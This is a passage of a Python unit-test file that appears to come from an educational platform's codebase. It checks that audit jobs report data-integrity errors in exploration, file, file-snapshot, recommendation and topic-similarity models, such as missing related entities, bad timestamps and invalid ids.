run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_exploration_related_property(self):
self.model_instance_0.title = 'invalid'
self.model_instance_0.put()
expected_output = [
(
u'[u\'failed validation check for title field check of '
'ExpSummaryModel\', '
'[u\'Entity id %s: title field in entity: invalid does not '
'match corresponding exploration title field: New title\']]'
) % self.model_instance_0.id,
u'[u\'fully-validated ExpSummaryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_exploration_rights_related_property(self):
self.model_instance_0.status = 'public'
self.model_instance_0.put()
expected_output = [
(
u'[u\'failed validation check for status field check of '
'ExpSummaryModel\', '
'[u\'Entity id %s: status field in entity: public does not '
'match corresponding exploration rights status field: '
'private\']]'
) % self.model_instance_0.id,
u'[u\'fully-validated ExpSummaryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
class FileMetadataModelValidatorTests(test_utils.GenericTestBase):
def setUp(self):
super(FileMetadataModelValidatorTests, self).setUp()
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
explorations = [exp_domain.Exploration.create_default_exploration(
'exp%s' % i,
title='title %d' % i,
category='category%d' % i,
) for i in xrange(2)]
for exp in explorations:
exp_services.save_new_exploration(self.owner_id, exp)
self.model_instance_0 = file_models.FileMetadataModel.create(
'exploration/exp0', 'assets/image/img0.png')
self.model_instance_0.commit(self.owner_id, [])
self.model_instance_1 = file_models.FileMetadataModel.create(
'exploration/exp1', '/exploration/exp1/assets/audio/aud1.mp3')
self.model_instance_1.commit(self.owner_id, [])
self.job_class = (
prod_validation_jobs_one_off.FileMetadataModelAuditOneOffJob)
def test_standard_operation(self):
expected_output = [
u'[u\'fully-validated FileMetadataModel\', 2]']
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance_0.created_on = (
self.model_instance_0.last_updated + datetime.timedelta(days=1))
self.model_instance_0.commit(feconf.SYSTEM_COMMITTER_ID, [])
expected_output = [
(
u'[u\'failed validation check for time field relation check '
'of FileMetadataModel\', '
'[u\'Entity id %s: The created_on field has a value '
'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance_0.id,
self.model_instance_0.created_on,
self.model_instance_0.last_updated
),
u'[u\'fully-validated FileMetadataModel\', 1]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_last_updated_greater_than_current_time(self):
self.model_instance_1.delete(feconf.SYSTEM_COMMITTER_ID, 'delete')
expected_output = [(
u'[u\'failed validation check for current time check of '
'FileMetadataModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_exploration_model_failure(self):
exp_models.ExplorationModel.get_by_id('exp1').delete(
feconf.SYSTEM_COMMITTER_ID, '', [])
expected_output = [
(
u'[u\'failed validation check for exploration_ids field '
'check of FileMetadataModel\', '
'[u"Entity id %s: based on field exploration_ids having '
'value exp1, expect model ExplorationModel with id exp1 but it '
'doesn\'t exist"]]') % self.model_instance_1.id,
u'[u\'fully-validated FileMetadataModel\', 1]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_snapshot_metadata_model_failure(self):
file_models.FileMetadataSnapshotMetadataModel.get_by_id(
'%s-1' % self.model_instance_0.id).delete()
expected_output = [
(
u'[u\'failed validation check for snapshot_metadata_ids '
'field check of FileMetadataModel\', '
'[u"Entity id %s: based on field snapshot_metadata_ids '
'having value %s-1, expect model '
'FileMetadataSnapshotMetadataModel '
'with id %s-1 but it doesn\'t exist"]]') % (
self.model_instance_0.id, self.model_instance_0.id,
self.model_instance_0.id),
u'[u\'fully-validated FileMetadataModel\', 1]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_snapshot_content_model_failure(self):
file_models.FileMetadataSnapshotContentModel.get_by_id(
'%s-1' % self.model_instance_0.id).delete()
expected_output = [
(
u'[u\'failed validation check for snapshot_content_ids '
'field check of FileMetadataModel\', '
'[u"Entity id %s: based on field snapshot_content_ids having '
'value %s-1, expect model FileMetadataSnapshotContentModel '
'with id %s-1 but it doesn\'t exist"]]') % (
self.model_instance_0.id, self.model_instance_0.id,
self.model_instance_0.id),
u'[u\'fully-validated FileMetadataModel\', 1]']
run_job_and_check_output(self, expected_output, sort=True)
class FileMetadataSnapshotMetadataModelValidatorTests(
test_utils.GenericTestBase):
def setUp(self):
super(FileMetadataSnapshotMetadataModelValidatorTests, self).setUp()
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.signup(USER_EMAIL, USER_NAME)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
self.user_id = self.get_user_id_from_email(USER_EMAIL)
explorations = [exp_domain.Exploration.create_default_exploration(
'exp%s' % i,
title='title %d' % i,
category='category%d' % i,
) for i in xrange(2)]
for exp in explorations:
exp_services.save_new_exploration(self.owner_id, exp)
file_metadata_model_0 = file_models.FileMetadataModel.create(
'exploration/exp0', 'assets/image/img0.png')
file_metadata_model_0.commit(self.owner_id, [])
file_metadata_model_1 = file_models.FileMetadataModel.create(
'exploration/exp1', '/exploration/exp1/assets/audio/aud1.mp3')
file_metadata_model_1.commit(self.user_id, [])
self.id_0 = file_metadata_model_0.id
self.id_1 = file_metadata_model_1.id
self.model_instance_0 = (
file_models.FileMetadataSnapshotMetadataModel.get_by_id(
'%s-1' % self.id_0))
self.model_instance_1 = (
file_models.FileMetadataSnapshotMetadataModel.get_by_id(
'%s-1' % self.id_1))
self.job_class = (
prod_validation_jobs_one_off
.FileMetadataSnapshotMetadataModelAuditOneOffJob)
def test_standard_operation(self):
expected_output = [
u'[u\'fully-validated FileMetadataSnapshotMetadataModel\', 2]']
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance_0.created_on = (
self.model_instance_0.last_updated + datetime.timedelta(days=1))
self.model_instance_0.put()
expected_output = [(
u'[u\'failed validation check for time field relation check '
'of FileMetadataSnapshotMetadataModel\', '
'[u\'Entity id %s: The created_on field has a value '
'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance_0.id,
self.model_instance_0.created_on,
self.model_instance_0.last_updated
), (
u'[u\'fully-validated '
'FileMetadataSnapshotMetadataModel\', 1]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_last_updated_greater_than_current_time(self):
self.model_instance_1.delete()
expected_output = [(
u'[u\'failed validation check for current time check of '
'FileMetadataSnapshotMetadataModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_file_metadata_model_failure(self):
file_models.FileMetadataModel.get_by_id(self.id_0).delete(
self.owner_id, '', [])
expected_output = [
(
u'[u\'failed validation check for file_metadata_ids '
'field check of FileMetadataSnapshotMetadataModel\', '
'[u"Entity id %s-1: based on field file_metadata_ids '
'having value %s, expect model FileMetadataModel with '
'id %s but it doesn\'t exist", u"Entity id %s-2: based on '
'field file_metadata_ids having value %s, expect model '
'FileMetadataModel with id %s but it doesn\'t exist"]]'
) % (
self.id_0, self.id_0, self.id_0, self.id_0,
self.id_0, self.id_0
),
u'[u\'fully-validated FileMetadataSnapshotMetadataModel\', 1]']
run_job_and_check_output(
self, expected_output, literal_eval=True)
def test_missing_committer_model_failure(self):
user_models.UserSettingsModel.get_by_id(self.user_id).delete()
expected_output = [
(
u'[u\'failed validation check for committer_ids field '
'check of FileMetadataSnapshotMetadataModel\', '
'[u"Entity id %s-1: based on field committer_ids having '
'value %s, expect model UserSettingsModel with id %s '
'but it doesn\'t exist"]]'
) % (self.id_1, self.user_id, self.user_id), (
u'[u\'fully-validated '
'FileMetadataSnapshotMetadataModel\', 1]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_invalid_file_metadata_version_in_model_id(self):
model_with_invalid_version_in_id = (
file_models.FileMetadataSnapshotMetadataModel(
id='%s-3' % self.id_0, committer_id=self.owner_id,
commit_type='edit', commit_message='msg', commit_cmds=[{}]))
model_with_invalid_version_in_id.put()
expected_output = [
(
u'[u\'failed validation check for file metadata model '
'version check of FileMetadataSnapshotMetadataModel\', '
'[u\'Entity id %s-3: FileMetadata model corresponding to '
'id %s has a version 1 which is less than the version 3 in '
'snapshot metadata model id\']]'
) % (self.id_0, self.id_0), (
u'[u\'fully-validated FileMetadataSnapshotMetadataModel\', '
'2]')]
run_job_and_check_output(self, expected_output, sort=True)
class FileMetadataSnapshotContentModelValidatorTests(
test_utils.GenericTestBase):
def setUp(self):
super(FileMetadataSnapshotContentModelValidatorTests, self).setUp()
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
explorations = [exp_domain.Exploration.create_default_exploration(
'exp%s' % i,
title='title %d' % i,
category='category%d' % i,
) for i in xrange(2)]
for exp in explorations:
exp_services.save_new_exploration(self.owner_id, exp)
file_metadata_model_0 = file_models.FileMetadataModel.create(
'exploration/exp0', 'assets/image/img0.png')
file_metadata_model_0.commit(self.owner_id, [])
file_metadata_model_1 = file_models.FileMetadataModel.create(
'exploration/exp1', '/exploration/exp1/assets/audio/aud1.mp3')
file_metadata_model_1.commit(self.owner_id, [])
self.id_0 = file_metadata_model_0.id
self.id_1 = file_metadata_model_1.id
self.model_instance_0 = (
file_models.FileMetadataSnapshotContentModel.get_by_id(
'%s-1' % self.id_0))
self.model_instance_1 = (
file_models.FileMetadataSnapshotContentModel.get_by_id(
'%s-1' % self.id_1))
self.job_class = (
prod_validation_jobs_one_off
.FileMetadataSnapshotContentModelAuditOneOffJob)
def test_standard_operation(self):
expected_output = [
u'[u\'fully-validated FileMetadataSnapshotContentModel\', 2]']
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance_0.created_on = (
self.model_instance_0.last_updated + datetime.timedelta(days=1))
self.model_instance_0.put()
expected_output = [(
u'[u\'failed validation check for time field relation check '
'of FileMetadataSnapshotContentModel\', '
'[u\'Entity id %s: The created_on field has a value '
'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance_0.id,
self.model_instance_0.created_on,
self.model_instance_0.last_updated
), (
u'[u\'fully-validated '
'FileMetadataSnapshotContentModel\', 1]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_last_updated_greater_than_current_time(self):
self.model_instance_1.delete()
expected_output = [(
u'[u\'failed validation check for current time check of '
'FileMetadataSnapshotContentModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_file_metadata_model_failure(self):
file_models.FileMetadataModel.get_by_id(
self.id_0).delete(self.owner_id, '', [])
expected_output = [
(
u'[u\'failed validation check for file_metadata_ids '
'field check of FileMetadataSnapshotContentModel\', '
'[u"Entity id %s-1: based on field file_metadata_ids '
'having value %s, expect model FileMetadataModel with '
'id %s but it doesn\'t exist", u"Entity id %s-2: based on '
'field file_metadata_ids having value %s, expect model '
'FileMetadataModel with id %s but it doesn\'t exist"]]'
) % (
self.id_0, self.id_0, self.id_0, self.id_0, self.id_0,
self.id_0),
u'[u\'fully-validated FileMetadataSnapshotContentModel\', 1]']
run_job_and_check_output(self, expected_output, literal_eval=True)
def test_invalid_file_metadata_version_in_model_id(self):
model_with_invalid_version_in_id = (
file_models.FileMetadataSnapshotContentModel(
id='%s-3' % self.id_0))
model_with_invalid_version_in_id.content = {}
model_with_invalid_version_in_id.put()
expected_output = [
(
u'[u\'failed validation check for file metadata model '
'version check of FileMetadataSnapshotContentModel\', '
'[u\'Entity id %s-3: FileMetadata model corresponding to '
'id %s has a version 1 which is less than '
'the version 3 in snapshot content model id\']]'
) % (self.id_0, self.id_0), (
u'[u\'fully-validated FileMetadataSnapshotContentModel\', '
'2]')]
run_job_and_check_output(self, expected_output, sort=True)
class FileModelValidatorTests(test_utils.GenericTestBase):
def setUp(self):
super(FileModelValidatorTests, self).setUp()
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
explorations = [exp_domain.Exploration.create_default_exploration(
'exp%s' % i,
title='title %d' % i,
category='category%d' % i,
) for i in xrange(2)]
for exp in explorations:
exp_services.save_new_exploration(self.owner_id, exp)
self.model_instance_0 = file_models.FileModel.create(
'exploration/exp0', 'assets/image/img0.png')
self.model_instance_0.commit(self.owner_id, [])
self.model_instance_1 = file_models.FileModel.create(
'exploration/exp1', '/exploration/exp1/assets/audio/aud1.mp3')
self.model_instance_1.commit(self.owner_id, [])
self.job_class = (
prod_validation_jobs_one_off.FileModelAuditOneOffJob)
def test_standard_operation(self):
expected_output = [
u'[u\'fully-validated FileModel\', 2]']
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance_0.created_on = (
self.model_instance_0.last_updated + datetime.timedelta(days=1))
self.model_instance_0.commit(feconf.SYSTEM_COMMITTER_ID, [])
expected_output = [
(
u'[u\'failed validation check for time field relation check '
'of FileModel\', '
'[u\'Entity id %s: The created_on field has a value '
'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance_0.id,
self.model_instance_0.created_on,
self.model_instance_0.last_updated
),
u'[u\'fully-validated FileModel\', 1]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_last_updated_greater_than_current_time(self):
self.model_instance_1.delete(feconf.SYSTEM_COMMITTER_ID, 'delete')
expected_output = [(
u'[u\'failed validation check for current time check of '
'FileModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_exploration_model_failure(self):
exp_models.ExplorationModel.get_by_id('exp1').delete(
feconf.SYSTEM_COMMITTER_ID, '', [])
expected_output = [
(
u'[u\'failed validation check for exploration_ids field '
'check of FileModel\', '
'[u"Entity id %s: based on field exploration_ids having '
'value exp1, expect model ExplorationModel with id exp1 '
'but it doesn\'t exist"]]') % self.model_instance_1.id,
u'[u\'fully-validated FileModel\', 1]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_snapshot_metadata_model_failure(self):
file_models.FileSnapshotMetadataModel.get_by_id(
'%s-1' % self.model_instance_0.id).delete()
expected_output = [
(
u'[u\'failed validation check for snapshot_metadata_ids '
'field check of FileModel\', '
'[u"Entity id %s: based on field snapshot_metadata_ids '
'having value %s-1, expect model FileSnapshotMetadataModel '
'with id %s-1 but it doesn\'t exist"]]') % (
self.model_instance_0.id, self.model_instance_0.id,
self.model_instance_0.id),
u'[u\'fully-validated FileModel\', 1]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_snapshot_content_model_failure(self):
file_models.FileSnapshotContentModel.get_by_id(
'%s-1' % self.model_instance_0.id).delete()
expected_output = [
(
u'[u\'failed validation check for snapshot_content_ids '
'field check of FileModel\', '
'[u"Entity id %s: based on field snapshot_content_ids having '
'value %s-1, expect model FileSnapshotContentModel '
'with id %s-1 but it doesn\'t exist"]]') % (
self.model_instance_0.id, self.model_instance_0.id,
self.model_instance_0.id),
u'[u\'fully-validated FileModel\', 1]']
run_job_and_check_output(self, expected_output, sort=True)
class FileSnapshotMetadataModelValidatorTests(
test_utils.GenericTestBase):
def setUp(self):
super(FileSnapshotMetadataModelValidatorTests, self).setUp()
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.signup(USER_EMAIL, USER_NAME)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
self.user_id = self.get_user_id_from_email(USER_EMAIL)
explorations = [exp_domain.Exploration.create_default_exploration(
'exp%s' % i,
title='title %d' % i,
category='category%d' % i,
) for i in xrange(2)]
for exp in explorations:
exp_services.save_new_exploration(self.owner_id, exp)
file_model_0 = file_models.FileModel.create(
'exploration/exp0', 'assets/image/img0.png')
file_model_0.commit(self.owner_id, [])
file_model_1 = file_models.FileModel.create(
'exploration/exp1', '/exploration/exp1/assets/audio/aud1.mp3')
file_model_1.commit(self.user_id, [])
self.id_0 = file_model_0.id
self.id_1 = file_model_1.id
self.model_instance_0 = (
file_models.FileSnapshotMetadataModel.get_by_id(
'%s-1' % self.id_0))
self.model_instance_1 = (
file_models.FileSnapshotMetadataModel.get_by_id(
'%s-1' % self.id_1))
self.job_class = (
prod_validation_jobs_one_off
.FileSnapshotMetadataModelAuditOneOffJob)
def test_standard_operation(self):
expected_output = [
u'[u\'fully-validated FileSnapshotMetadataModel\', 2]']
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance_0.created_on = (
self.model_instance_0.last_updated + datetime.timedelta(days=1))
self.model_instance_0.put()
expected_output = [(
u'[u\'failed validation check for time field relation check '
'of FileSnapshotMetadataModel\', '
'[u\'Entity id %s: The created_on field has a value '
'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance_0.id,
self.model_instance_0.created_on,
self.model_instance_0.last_updated
), (
u'[u\'fully-validated '
'FileSnapshotMetadataModel\', 1]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_last_updated_greater_than_current_time(self):
self.model_instance_1.delete()
expected_output = [(
u'[u\'failed validation check for current time check of '
'FileSnapshotMetadataModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_file_model_failure(self):
file_models.FileModel.get_by_id(self.id_0).delete(
self.owner_id, '', [])
expected_output = [
(
u'[u\'failed validation check for file_ids '
'field check of FileSnapshotMetadataModel\', '
'[u"Entity id %s-1: based on field file_ids '
'having value %s, expect model FileModel with '
'id %s but it doesn\'t exist", u"Entity id %s-2: based on '
'field file_ids having value %s, expect model '
'FileModel with id %s but it doesn\'t exist"]]'
) % (
self.id_0, self.id_0, self.id_0, self.id_0,
self.id_0, self.id_0),
u'[u\'fully-validated FileSnapshotMetadataModel\', 1]']
run_job_and_check_output(
self, expected_output, literal_eval=True)
def test_missing_committer_model_failure(self):
user_models.UserSettingsModel.get_by_id(self.user_id).delete()
expected_output = [
(
u'[u\'failed validation check for committer_ids field '
'check of FileSnapshotMetadataModel\', '
'[u"Entity id %s-1: based on field committer_ids having '
'value %s, expect model UserSettingsModel with id %s '
'but it doesn\'t exist"]]'
) % (self.id_1, self.user_id, self.user_id), (
u'[u\'fully-validated '
'FileSnapshotMetadataModel\', 1]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_invalid_file_version_in_model_id(self):
model_with_invalid_version_in_id = (
file_models.FileSnapshotMetadataModel(
id='%s-3' % self.id_0, committer_id=self.owner_id,
commit_type='edit', commit_message='msg', commit_cmds=[{}]))
model_with_invalid_version_in_id.put()
expected_output = [
(
u'[u\'failed validation check for file model '
'version check of FileSnapshotMetadataModel\', '
'[u\'Entity id %s-3: File model corresponding to '
'id %s has a version 1 which is less than the version 3 in '
'snapshot metadata model id\']]'
) % (self.id_0, self.id_0), (
u'[u\'fully-validated FileSnapshotMetadataModel\', '
'2]')]
run_job_and_check_output(self, expected_output, sort=True)
class FileSnapshotContentModelValidatorTests(test_utils.GenericTestBase):
def setUp(self):
super(FileSnapshotContentModelValidatorTests, self).setUp()
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
explorations = [exp_domain.Exploration.create_default_exploration(
'exp%s' % i,
title='title %d' % i,
category='category%d' % i,
) for i in xrange(2)]
for exp in explorations:
exp_services.save_new_exploration(self.owner_id, exp)
file_model_0 = file_models.FileModel.create(
'exploration/exp0', 'assets/image/img0.png')
file_model_0.commit(self.owner_id, [])
file_model_1 = file_models.FileModel.create(
'exploration/exp1', '/exploration/exp1/assets/audio/aud1.mp3')
file_model_1.commit(self.owner_id, [])
self.id_0 = file_model_0.id
self.id_1 = file_model_1.id
self.model_instance_0 = (
file_models.FileSnapshotContentModel.get_by_id(
'%s-1' % self.id_0))
self.model_instance_1 = (
file_models.FileSnapshotContentModel.get_by_id(
'%s-1' % self.id_1))
self.job_class = (
prod_validation_jobs_one_off.FileSnapshotContentModelAuditOneOffJob)
def test_standard_operation(self):
expected_output = [
u'[u\'fully-validated FileSnapshotContentModel\', 2]']
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance_0.created_on = (
self.model_instance_0.last_updated + datetime.timedelta(days=1))
self.model_instance_0.put()
expected_output = [(
u'[u\'failed validation check for time field relation check '
'of FileSnapshotContentModel\', '
'[u\'Entity id %s: The created_on field has a value '
'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance_0.id,
self.model_instance_0.created_on,
self.model_instance_0.last_updated
), (
u'[u\'fully-validated '
'FileSnapshotContentModel\', 1]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_last_updated_greater_than_current_time(self):
self.model_instance_1.delete()
expected_output = [(
u'[u\'failed validation check for current time check of '
'FileSnapshotContentModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_file_model_failure(self):
file_models.FileModel.get_by_id(
self.id_0).delete(self.owner_id, '', [])
expected_output = [
(
u'[u\'failed validation check for file_ids '
'field check of FileSnapshotContentModel\', '
'[u"Entity id %s-1: based on field file_ids '
'having value %s, expect model FileModel with '
'id %s but it doesn\'t exist", u"Entity id %s-2: based on '
'field file_ids having value %s, expect model '
'FileModel with id %s but it doesn\'t exist"]]'
) % (
self.id_0, self.id_0, self.id_0, self.id_0, self.id_0,
self.id_0),
u'[u\'fully-validated FileSnapshotContentModel\', 1]']
run_job_and_check_output(self, expected_output, literal_eval=True)
def test_invalid_file_version_in_model_id(self):
model_with_invalid_version_in_id = (
file_models.FileSnapshotContentModel(
id='%s-3' % self.id_0))
model_with_invalid_version_in_id.content = 'content'
model_with_invalid_version_in_id.put()
expected_output = [
(
u'[u\'failed validation check for file model '
'version check of FileSnapshotContentModel\', '
'[u\'Entity id %s-3: File model corresponding to '
'id %s has a version 1 which is less than '
'the version 3 in snapshot content model id\']]'
) % (self.id_0, self.id_0), (
u'[u\'fully-validated FileSnapshotContentModel\', '
'2]')]
run_job_and_check_output(self, expected_output, sort=True)
class ExplorationRecommendationsModelValidatorTests(test_utils.GenericTestBase):
def setUp(self):
super(ExplorationRecommendationsModelValidatorTests, self).setUp()
self.signup(USER_EMAIL, USER_NAME)
self.user_id = self.get_user_id_from_email(USER_EMAIL)
explorations = [exp_domain.Exploration.create_default_exploration(
'%s' % i,
title='title %d' % i,
category='category%d' % i,
) for i in xrange(6)]
for exp in explorations:
exp_services.save_new_exploration(self.user_id, exp)
recommendations_services.set_recommendations('0', ['3', '4'])
recommendations_services.set_recommendations('1', ['5'])
self.model_instance_0 = (
recommendations_models.ExplorationRecommendationsModel.get_by_id(
'0'))
self.model_instance_1 = (
recommendations_models.ExplorationRecommendationsModel.get_by_id(
'1'))
self.job_class = (
prod_validation_jobs_one_off
.ExplorationRecommendationsModelAuditOneOffJob)
def test_standard_model(self):
expected_output = [(
u'[u\'fully-validated ExplorationRecommendationsModel\', 2]')]
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance_0.created_on = (
self.model_instance_0.last_updated + datetime.timedelta(days=1))
self.model_instance_0.put()
expected_output = [
(
u'[u\'failed validation check for time field relation check '
'of ExplorationRecommendationsModel\', '
'[u\'Entity id %s: The created_on field has a value '
'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance_0.id, self.model_instance_0.created_on,
self.model_instance_0.last_updated),
u'[u\'fully-validated ExplorationRecommendationsModel\', 1]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_last_updated_greater_than_current_time(self):
self.model_instance_1.delete()
expected_output = [(
u'[u\'failed validation check for current time check of '
'ExplorationRecommendationsModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output)
def test_model_with_missing_recommended_exploration(self):
exp_models.ExplorationModel.get_by_id('3').delete(
self.user_id, '', [{}])
expected_output = [
(
u'[u\'failed validation check for exploration_ids field '
'check of ExplorationRecommendationsModel\', '
'[u"Entity id 0: based on field exploration_ids having value '
'3, expect model ExplorationModel with '
'id 3 but it doesn\'t exist"]]'
),
u'[u\'fully-validated ExplorationRecommendationsModel\', 1]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_id_in_recommended_ids(self):
self.model_instance_0.recommended_exploration_ids = ['0', '4']
self.model_instance_0.put()
expected_output = [
(
u'[u\'failed validation check for item exploration id check '
'of ExplorationRecommendationsModel\', '
'[u\'Entity id 0: The exploration id: 0 for which the '
'entity is created is also present in the recommended '
'exploration ids for entity\']]'
),
u'[u\'fully-validated ExplorationRecommendationsModel\', 1]']
run_job_and_check_output(self, expected_output, sort=True)
class TopicSimilaritiesModelValidatorTests(test_utils.GenericTestBase):
def setUp(self):
super(TopicSimilaritiesModelValidatorTests, self).setUp()
self.model_instance = recommendations_models.TopicSimilaritiesModel(
id=recommendations_models.TOPIC_SIMILARITIES_ID)
self.content = {
'Art': {'Art': '1.0', 'Biology': '0.8', 'Chemistry': '0.1'},
'Biology': {'Art': '0.8', 'Biology': '1.0', 'Chemistry': '0.5'},
'Chemistry': {'Art': '0.1', 'Biology': '0.5', 'Chemistry': '1.0'},
}
self.model_instance.content = self.content
self.model_instance.put()
self.job_class = (
prod_validation_jobs_one_off.TopicSimilaritiesModelAuditOneOffJob)
def test_standard_model(self):
expected_output = [(
u'[u\'fully-validated TopicSimilaritiesModel\', 1]')]
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance.created_on = (
self.model_instance.last_updated + datetime.timedelta(days=1))
self.model_instance.put()
expected_output = [
(
u'[u\'failed validation check for time field relation check '
'of TopicSimilaritiesModel\', '
'[u\'Entity id %s: The created_on field has a value '
'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance.id, self.model_instance.created_on,
self.model_instance.last_updated)]
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_last_updated_greater_than_current_time(self):
expected_output = [(
u'[u\'failed validation check for current time check of '
'TopicSimilaritiesModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance.id, self.model_instance.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output)
def test_model_with_invalid_id(self):
model_with_invalid_id = recommendations_models.TopicSimilaritiesModel(
id='invalid', content=self.content)
model_with_invalid_id.put()
expected_output = [
(
u'[u\'failed validation check for model id check of '
'TopicSimilaritiesModel\', '
'[u\'Entity id invalid: Entity id does not match regex '
'pattern\']]'
),
u'[u\'fully-validated TopicSimilaritiesModel\', 1]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_topic_similarities_columns(self):
content = {
'Art': {'Art': '1.0', 'Biology': '0.5'},
'Biology': {}
}
self.model_instance.content = content
self.model_instance.put()
expected_output = [(
u'[u\'failed validation check for topic similarity check '
'of TopicSimilaritiesModel\', '
'[u"Entity id topics: Topic similarity validation for '
'content: {u\'Biology\': {}, u\'Art\': {u\'Biology\': u\'0.5\', '
'u\'Art\': u\'1.0\'}} fails with error: Length of topic '
'similarities columns: 1 does not match length of '
'topic list: 2."]]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_topic(self):
content = {
'Art': {'Art': '1.0', 'invalid': '0.5'},
'invalid': {'Art': '0.5', 'invalid': '1.0'}
}
self.model_instance.content = content
self.model_instance.put()
expected_output = [(
u'[u\'failed validation check for topic similarity check '
'of TopicSimilaritiesModel\', '
'[u"Entity id topics: Topic similarity validation for '
'content: {u\'Art\': {u\'Art\': u\'1.0\', u\'invalid\': u\'0.5\'}, '
'u\'invalid\': {u\'Art\': u\'0.5\', u\'invalid\': u\'1.0\'}} '
'fails with error: Topic invalid not in list of known topics."]]')]
run_job_and_check_output(self, expected_output)
def test_model_with_invalid_topic_similarities_rows(self):
content = {
